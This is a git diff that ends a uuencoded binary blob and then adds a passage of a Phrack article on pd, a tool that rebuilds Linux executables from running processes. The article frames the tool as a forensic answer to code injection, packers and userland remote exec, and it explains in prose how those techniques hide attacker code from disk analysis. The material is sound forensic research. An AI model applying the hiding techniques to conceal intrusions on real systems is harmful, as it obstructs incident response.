+M_VI29WJQ.S&1`)A<AZPT5##2(SVY:JN/C/7E(SI%X..*6;@(B#6MK(3H_&++
+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
+7/7?/W7/WW#UWS[_#\W\!\B#2U`#P````
+`
+end
diff --git a/phrack63/12.txt b/phrack63/12.txt
new file mode 100644
index 0000000..df00afe
--- /dev/null
+++ b/phrack63/12.txt
@@ -0,0 +1,1904 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x0c of 0x14
+
+|=--------------=[ Advances in remote-exec AntiForensics ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ by ilo-- ]=-------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+ 1.0 - Abstract
+ 2.0 - Introduction
+ 3.0 - Principles
+ 4.0 - Background
+ 5.0 - Requirements
+ 6.0 - Design and Implementation
+     6.1- Get information of a process
+     6.2- Get binary data of that process from memory
+     6.3- Order/Clean and safe binary data in a file
+     6.4- Build an ELF header for that file to be loaded
+     6.5- Adjust binary information
+     6.6- Resume of process in steps.
+     6.7- pd, the program
+ 7.0 - Defeating pd, or defeating process dumping
+ 8.0 - Conclusion
+ 9.0 - Greets
+10.0 - References
+11.0 - SourceCode
+
+--[ 1.0 - Abstract
+
+    PD  is  a proof  of  concept  tool being  released  to  help rebuilding
+or recovering a binary file from  a running process, even if the file never
+existed in  the disk.  Computer Forensics,  reverse engineering, intruders,
+administrators, software protection, all share the same piece of the puzzle
+in a computer. Even if the  intentions are quite different, get or hide the
+real  (clean)  code,  everything  revolves  around it:  binary  code  files
+(executable) and running process.
+
+    Manipulation of  a  running application  using  code injection,  hiding
+using ciphers  or  binary packers are some of the  current ways to hide the
+code  being executed  from  inspectors,  as executed code is different than
+stored in disk. The  last days  a new  anti forensics method  published  in
+phrack  62  (Volume 0x0b,  Issue 0x3e,  phile  0x08  by  grugq)  showed  an
+"user landexec module". ulexec allows the execution of a binary sent by the
+network from another  host without  writing  the file  to  disk, hiding any
+clue  to forensics  analysts.  The  main  intention of  this  article is to
+show  a process to  success in the  recovering or rebuilding  a binary file
+from a running process, and PD is a sample implementation for that process.
+Tests includes  injected  code,  burneyed  file  and  the  most  exotic  of
+all, rebuilding a  file executed using  grugq's "userland remote exec" that
+was never saved in disk.
+
+
+--[ 2.0 - Introduction
+
+    An executable contains the data the system needs to run the application
+contained  in the  file.   Some of  the data  stored  in the  file is  just
+information the  system should consider before  launching, and requirements
+needed by the  application binary code.  Running an  executable is a kernel
+process that grabs that information from the file, sets up the needings for
+that program and launches it.
+
+However,  although  a binary file  contains  the data  needed to  launch  a
+process and the program itself, there's no reason to trust that program has
+not  been  modified  during execution.  One  common task  to avoid host IDS
+detecting binary manipulation  is  to modify  a running process  instead of
+binary stored files.  A process may be running some kind of troyan injected
+code until system restart, when original program will be executed again.
+
+In selfmodifing,  ciphered or compressed applications, program code in disk
+may differ from program code in memory due to  'by design' functionality of
+the file.  It's  a common task to avoid reverse engineering  and scope goes
+from virus to  commercial software.  Once the program is ran,  it deciphers
+itself remaining clean in memory content  of the process  until the end  of
+execution.  However,  any attempt to see the program contained in the file
+will require a great effort  due to complexity of the implemented cipher or
+obfuscation mechanism.
+
+In other hand,  there's no reason to keep the binary  file once the process
+is started (for  example a troyan installer).  Many  forensics methods rely
+their investigation in disk  MAC (modify, create, access) timeline analysis
+after  powering down  the system,  and that's  the main  reason  when grugq
+talked about user  land remote exec: there's no need to  write data in disk
+if you  can forge  the system to  run a  memory portion emulating  a kernel
+loader. This kind  of data contraception may drop any  attempt to create an
+activity timeline due to the missing information: the files an intruder may
+install in  the system.  Without  traces, any further  investigation would
+not reveal attacker information. That's the description of the "remote exec
+attack", defeated later in this paper. 
+
+All those scenarios presented are real, and in all of them memory system of
+the suspicious  process should be  analyzed, however there's  no mechanism
+allowing  this  operation. There  are  several  tools  to dump  the  memory
+content,   but,  in   a  "human   unreadable  -   system   unreadable"  raw
+format.  Analysis tools  may need  an executable formatted file,  and  also
+human analyst   may  need   a binary file   being launched  in  a  testing 
+environment (aka laboratory). Raw code,  or dumped  memory  code is  useful
+if  execution environment  is known,  but sometimes  untraceable.  Here  is
+where  pd  (as  concept)  may help  in the  analysis process,  rebuilding a
+working executable file from the  process, allowing researchers  to  launch
+when and where they need, and capable of being analyzed at any time in any 
+system. 
+
+Rebuilding a binary  file from a memory process allow us  to recover a file
+modified in run time or deciphered, and also recover if it's being executed
+but never  was saved in the  system (as the remote  executed using ulexec),
+preventing  from  data contraception  and  information  missing in  further
+analysis. 
+
+This paper  will describe  the process of  rebuilding an executable  from a
+process in  memory, showing each  involved data in  every step. One  of the
+main goals  of the article  is to realize  where the recovering  process is
+vulnerable  to manipulation.   Knowing our  limits  is our  best effort  to
+develop a better process. 
+
+There  are  several  posts  in  internet  related  to  code  injection  and
+obfuscation.   For  userland remote  execution  trick  refer  to phrack  62
+(Volume 0x0b, Issue 0x3e, phile 0x08 by grugq)
+
+
+--[ 3.0 - Principles
+
+    Until this  year the most hiding  method  used for code  (malicious  or
+not) hiding was  the  packing/cyphering one.  During  execution  time,  the
+original code/file   should  be   rebuilt  in   disk,  in memory, or  where
+the  unpacker/uncypher should need.  The disk file still  remains  ciphered
+hiding it's content. 
+
+To avoid disk  data written and Host IDS detection,  several ways are being
+used until now. Injecting binary code  right in a running process is one of
+them.  In a  forensics analysis some checks to  the original file signature
+(or   MD5,   or  whatever)   my   fail,   warning   about  binary   content
+manipulation. If this code only resides in memory, the disk scan will never
+show its presence. 
+
+"Userland Remote Exec" is  a new kind of attack, as a  way to execute files
+downloaded from a  remote host without write them to  disk.  The main idea
+goes  through an  implementation  of a  kernel  loader, and  a remote  file
+transfer core. When "ul_remote_exec" program receives a binary file it sets
+up as  much information and  estructures as needed  to fork or  replace the
+existing  code  with the  downloaded  one, and  give  control  to this  new
+process.   It  safes  new   program  memory  pages,  setting  up  execution
+environment, and loading code and  data into the correct sections, the same
+way the system kernel does. The main difference is that system loads a file
+from disk, and UserLand Remote  Exec (down)"loads" a file from the network,
+ensuring no data is written in the disk. 
+
+With all these methods we have a running process with different binary data
+than saved in the disk (if existing there).  Different scenarios that could
+be resolved  with one technique: an interface allowing us to dump a process
+and  rebuild a  binary  file that  when  executed will  recreate this  same
+process. 
+
+
+--[ 4.0 - Background
+
+    Under Windows architecture  there're a  lot of useful  tools  providing
+this functionality in   user space. "procdump"  is  the name of  a  generic
+process dumper for this  operating  system,  although  there're  many  more
+tools including application specific un-packers and dumpers. 
+
+Under linux (*nix for x86 systems, the scope of this paper) several studies
+attempt  to  help analyzing  the  memory  (ie:  Zalewski's memfetch)  of  a
+process.  Kernel/system memory may give other useful information about any
+of the process being executed  (Wietse's memfetch).  Also, gdb now includes
+dumping feature, allowing the dump of memory blocks to disk. 
+
+There's  an  interesting  tool  comparing  a  process  and  a  binary  file
+(www.hick.org's  elfcmp). Although  I  discovered later  in  the study,  it
+didn't work for me. Anyway, it's an interesting topic in this article. 
+Recover a binary from a core dump is an easy task due to the implementation
+of the  core functionality. Silvio Cesare  stated that in  a complete paper
+(see references). 
+
+There's also a kernel module for recover a burneyed binary from memory once
+it's deciphered,  but in any case  it cares about binary  analysis. It just
+dumps a memory  region where burneye engine writes  dechypered data before
+executing. 
+
+All these approximations will not finish the process of recovering a binary
+file,  but they  will give  valuable information  and ideas  about  how the
+process should/would/could be. 
+
+The  program   included  here  is   an  example  of  defeating   all  these
+anti-forensics  methods, attaching  to  a pid,  analyzing  it's memory  and
+rebuilding a binary image allowing us to recover the process data and code,
+and also  re-execute  it in  a testing environment.  It  summarizes all the
+above  functionality   in an  attempt  to  create  a  rebuilding   working 
+interface. 
+
+
+--[ 5.0 - Requirements
+
+    In  an initial  approach  I  fall into  a  lot of  presumptions  due to
+the technology involved in the testing  environment. Linux  and  x86 32bits
+intel architecture was the  selected platform with kernel 2.4*.   There was
+a lot of analysis performed  in that platform  assuming some  of the kernel
+constants and specifications  removed  or  modified later.   Also, GCC  was
+the selected  compiler for the  binaries tested,  so instead of a  generic 
+ELF format, the gcc elf implementation  has been the referral  most of the 
+time. 
+
+After some investigation it was realized that all these presumptions should
+be removed from the code for compatibility in other test systems. Also, GCC
+was left apart in some cases, analyzing files programmed in asm. 
+
+The /proc filesystem  was first removed from analysis,  returning bak after
+some  further investigation.  /proc  filesystem is  a useful  resource for
+information gathering  about a  process from user  space (indeed,  it's the
+user space kernel interface for process information queries). 
+
+The concept of process dumping (sample code also) is very system dependant,
+as  kernel  and  customs loaders  may leave  memory in  different  states, 
+so there's no  a generic program ready-to-use  that could rebuild  any kind
+of executable with total  guaranties of use.  A program may  evolve in  run
+time loading some  code from a inspected  source, or delete the  used  code
+while being executed. 
+
+Also,  it's very  important to  realize  that even  if a  binary format  is
+standardized,  every file  is built  under compiler  implementation, so the
+information included in it may help or difficult the restoring process. 
+
+In this paper  there are several user interfaces to access  the memory of a
+process,  but the cheapest  one has  been selected:  ptrace.  From  now on,
+ptrace should  be a requirement  in the implementation  of PD, as  no other
+method to read process memory space has been included in the POC. 
+
+In order to  reproduce the tests, a linux kernel  2.4 without any security
+patch  (like grsecurity,  pax, or  other  ptrace and  stack protection)  is
+recommended, as well as gcc compiled binaries. Ptrace should be enabled and
+/proc filesystem would be useful.  grugq remote exec and burneyed had been
+successfully compiled in this environment,  so all the toolset for the test
+will be working. 
+
+Files dynamically linked to system libraries become system dependant if the
+dynamic  information  is  not  restored  to it's  original  state.   PD  is
+programmed  to restore  the dynamic  subsystem  (plt) of  any gcc  compiled
+binary, so gcc+ldd dynamic linked files  would be restored to work in other
+host correctly. 
+
+
+--[ 6.0 - Design and Implementation
+
+    Some common tasks   had been  identified to  success in the   dump of a
+process in  a generic  way.  The   design should  heavily rely  in   system
+dependant interfaces  for each  one,  so an exhaustive analysis  should  be
+performed in them:
+
+ 1- Get information of a process
+ 2- Get binary data of that process from memory
+ 3- Order/clean and safe binary data in a file
+ 4- Build an ELF header for the file to be correctly loaded
+ 5- Adjust binary information
+
+Also, there's a  previous step to resolve before doing  any of the previous
+tasks, it's, to get communication  with that process.  We need an interface
+to read all  this information from the system memory  space and process it.
+In  this  platform  there  are  some  of them  available  as  shown  below:
+
+ - (per process) own process memory 
+ - /proc file system
+ - raw access to /dev/kmem /dev/mem
+ - ptrace (from user space)
+
+Raw memory  access turns hard the  process of information  locating, as run
+time information  may be paged  or swapped, and  some memory may  be shared
+between processes, so for the POC it's has been removed as an option. 
+
+Per  Process method, even  if it  may appear  to be  too exotic,  should be
+considered as an option. The use of this method consists in exploitation of
+the execution  of the  process selected for  dump, as for  buffer overflow,
+library  modifications before loading  and any  other sophisticated  way to
+execute  our  code into  process  context.  Anyway  for  the  scope of  the
+analysis it's been deprecated also. 
+
+/proc and PTRACE are the available  options for the POC.  Each one has it's
+own limits  based in implementation of the  system.  As a POC,  PD will use
+/proc when available, and ptrace  if there's no more options.  Consider the
+use of the other methods when ptrace is not available in the system. 
+
+By  default  ptrace will  not  attach any  process  if  it's already  being
+attached by another. Each process may  be only attached by one parent. This
+limit is assumed as a requirement for PD to work. 
+
+
+----[ 6.1- Get information of a process
+
+    To know  all  the  information   needed to  rebuild an executable  it's
+important to know  the way  a process  is being executed  by the  system. 
+
+As  a short description, the system  will create an  entry in  the process 
+list, copy all data needed  for the process  and for the  system to success
+executing the binary and  launches it.    Not all the  data in  the file is
+needed during execution, some parts are only used by the loader to  correct
+map the memory and perform environment setup. 
+
+Getting information about  a process involves all data  finding that could
+be useful when rebuilding the  executable file, or finding memory location
+of the process, it's:
+
+ - Dynamic linker auxiliary vector array
+ - ELF signatures in memory
+ - Program Headers in memory
+ - task_struct and related information about the process
+   (memory usage,  memory permissions, ...)
+ - In raw access and pre process: permission checks of memory maps (rwx) 
+ - Execution  subsystems  (as  runtime  linking,  ABI  register,
+   pre-execution conditions, ..)
+ 
+
+Apart from the loading information (not removed from memory by default), A
+process has three  main memory sections: code, where  binary resides; data,
+where internal  program data  is being  written and read;  and stack,  as a
+temporal memory  pool for process execution internal  memory requests. Code
+and Data segments are read from the file in the loading part by the kernel,
+and  stack   is  built   by  the  loader   to  ensure   correct  execution.
+
+
+----[ 6.2- Get binary data of that process from memory
+
+    Once  we have  located that  information,  we  need to get  it from the
+memory. 
+
+For  this  task  we will  use  the  interface  selected earlier:  /proc  or
+ptrace. The main information we should not forget is:
+
